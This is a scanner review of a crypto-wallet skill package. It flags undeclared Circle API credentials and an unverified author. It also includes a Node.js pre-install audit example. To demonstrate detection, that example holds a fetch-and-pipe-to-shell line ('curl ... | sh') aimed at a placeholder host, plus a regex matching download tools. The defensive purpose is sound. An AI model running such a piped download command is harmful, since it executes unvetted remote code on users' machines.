Skill v1.0.2

ClawScan security

Nexwave Gateway · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Suspicious · Feb 11, 2026, 9:17 AM
Verdict
suspicious
Confidence
medium
Model
gpt-5-mini
Summary
The skill's code and instructions largely match its stated purpose (Circle Gateway / programmable wallets), but there are metadata inconsistencies, sensitive credentials are required, and the author/source is unverified — review before use.
Guidance
This package implements exactly what it says: a testnet demo of Circle Gateway + Circle Programmable (MPC) wallets. However:
1) The skill requires sensitive Circle developer credentials (API key, entity secret, wallet set ID). These grant the ability to create and sign transactions and should never be uploaded to untrusted systems or used with real/mainnet funds until you fully trust the code and author.
2) The registry metadata omitted the required env vars; that mismatch suggests sloppy packaging. Review the SKILL.md and code before running.
3) Confirm the author (nexwave) and owner, and prefer running the setup and scripts in an isolated environment (container or VM) and on testnets first.
4) Inspect the included JS files yourself (they are present) and verify that the endpoints (Circle Gateway testnet URL, Circle SDK, Arc RPC) are correct.
If you are not comfortable handling API secrets or signing transactions via a third-party service, do not install or supply credentials.

Review Dimensions

Purpose & Capability
note
The skill claims to provide unified USDC access via Circle Gateway and Circle Programmable Wallets, and the code, SKILL.md, and README all implement that flow (Gateway API client, EIP-712 typed data, Circle MPC wallet SDK). Requesting CIRCLE_API_KEY, CIRCLE_ENTITY_SECRET, and CIRCLE_WALLET_SET_ID is expected for this purpose. However, the registry metadata at the top of the package lists "Required env vars: none" while the SKILL.md and code clearly require those env vars: an inconsistency in the manifest/metadata.
Instruction Scope
ok
Runtime instructions are scoped to the Gateway use-case: run setup.sh, install Node deps, run check-balance.js / deposit.js / transfer.js. The SKILL.md and scripts only reference Circle credentials, the Gateway API, and the RPC endpoints needed for supported testnets. There are no instructions to read unrelated local files, the shell history, or arbitrary system configuration.
Install Mechanism
ok
There is no remote download of arbitrary archives; setup.sh runs npm install for known packages (viem, dotenv, @circle-fin/developer-controlled-wallets) and copies the included JS files into a gateway-app directory. This is a typical local project setup. Risk is moderate because running setup.sh will write files and install Node packages, but the packages are standard and the script does not fetch code from unknown URLs.
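The two checks above (env vars the code reads versus env vars the registry declares, and whether setup.sh pulls anything from the network) are mechanical enough to script before running any install step. The following Node.js audit is an added example written for this page; it is not the scanner's code and not part of the nexwave skill. The file contents, the variable name ARC_RPC_URL and the example.invalid URL are constructed stand-ins, not the skill's real files.

```javascript
// Pre-install audit for a skill package (added example, not the skill's code).
// (1) Which environment variables does the JS read via process.env, and which of
//     those are missing from the registry's declared list?
// (2) Does setup.sh contain any line that fetches content over the network?

// Matches process.env.NAME and process.env["NAME"] / process.env['NAME'].
const ENV_REF = /process\.env(?:\.([A-Za-z_]\w*)|\[\s*(['"])([A-Za-z_]\w*)\2\s*\])/g;

// Sorted, de-duplicated list of env var names a single source file reads.
function findEnvRefs(source) {
  const names = new Set();
  for (const m of source.matchAll(ENV_REF)) names.add(m[1] ?? m[3]);
  return [...names].sort();
}

// Env vars referenced in any source file but absent from the declared list.
function undeclaredEnvVars(sources, declared) {
  const declaredSet = new Set(declared);
  const undeclared = new Set();
  for (const src of Object.values(sources)) {
    for (const name of findEnvRefs(src)) if (!declaredSet.has(name)) undeclared.add(name);
  }
  return [...undeclared].sort();
}

// Non-comment lines of an install script that use a download tool or mention a
// URL. A setup that only runs `npm install <named packages>` yields none.
const FETCH_HINT = /\b(curl|wget|git\s+clone)\b|https?:\/\//;
function findRemoteFetches(script) {
  return script
    .split("\n")
    .map((line, i) => ({ line: i + 1, text: line.trim() }))
    .filter(({ text }) => text.length > 0 && !text.startsWith("#") && FETCH_HINT.test(text));
}

// Combine both checks into one verdict-style object.
function auditSkill({ sources, declaredEnv, setupScript }) {
  const undeclaredEnv = undeclaredEnvVars(sources, declaredEnv);
  const remoteFetches = findRemoteFetches(setupScript);
  return { undeclaredEnv, remoteFetches, needsReview: undeclaredEnv.length > 0 || remoteFetches.length > 0 };
}

// Constructed stand-ins for the skill's files (not the real contents).
// ARC_RPC_URL is an assumed name for an optional RPC override.
const SAMPLE_SOURCES = {
  "check-balance.js": `require("dotenv").config();
const apiKey = process.env.CIRCLE_API_KEY;
const entitySecret = process.env["CIRCLE_ENTITY_SECRET"];`,
  "deposit.js": `const walletSetId = process.env.CIRCLE_WALLET_SET_ID;
const rpc = process.env.ARC_RPC_URL ?? "http://localhost:8545";`,
};

// Constructed setup.sh in the shape the review describes: copy files, npm install, write .env template.
const SAMPLE_SETUP_SH = `#!/usr/bin/env bash
set -euo pipefail
mkdir -p gateway-app && cp check-balance.js deposit.js transfer.js gateway-app/
cd gateway-app
npm install viem dotenv @circle-fin/developer-controlled-wallets
[ -f .env ] || printf 'CIRCLE_API_KEY=\\nCIRCLE_ENTITY_SECRET=\\nCIRCLE_WALLET_SET_ID=\\n' > .env
`;

// Same script with a hypothetical remote fetch appended, to show what the check flags.
const TAMPERED_SETUP_SH = SAMPLE_SETUP_SH + "curl -sSL https://example.invalid/post-install.sh | sh\n";

// Registry said "Required env vars: none", so the declared list is empty.
console.log(JSON.stringify(auditSkill({ sources: SAMPLE_SOURCES, declaredEnv: [], setupScript: SAMPLE_SETUP_SH }), null, 2));
console.log(JSON.stringify(findRemoteFetches(TAMPERED_SETUP_SH)));
```

With an empty declared list the audit reports all four env vars as undeclared and sets needsReview, which is exactly the manifest mismatch the scanner flagged; the clean setup.sh produces no fetch hits, while the tampered variant pinpoints the curl line by number. Any hit from findRemoteFetches is a prompt for manual reading, not proof of malice (an echoed documentation URL would also match).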
Credentials
concern
The skill requires developer-level Circle credentials (CIRCLE_API_KEY, CIRCLE_ENTITY_SECRET, CIRCLE_WALLET_SET_ID) which legitimately enable the described behavior but are highly sensitive: they allow creating wallets, signing transactions via Circle's API, and moving funds. The requirement is proportionate to the functionality, but because the author/source is unverified and the package metadata omitted these env vars, users should treat the credentials as high-risk and avoid using production/mainnet funds without full trust and review. setup.sh also creates a local .env template; ensure it is stored securely.
Persistence & Privilege
ok
The skill does not request always:true, does not modify other skills, and won't be force-included. It copies files into a local gateway-app directory and creates a .env template when you run setup.sh, which is expected for a local demo app. There is no evidence it alters global agent settings or other skills' configurations.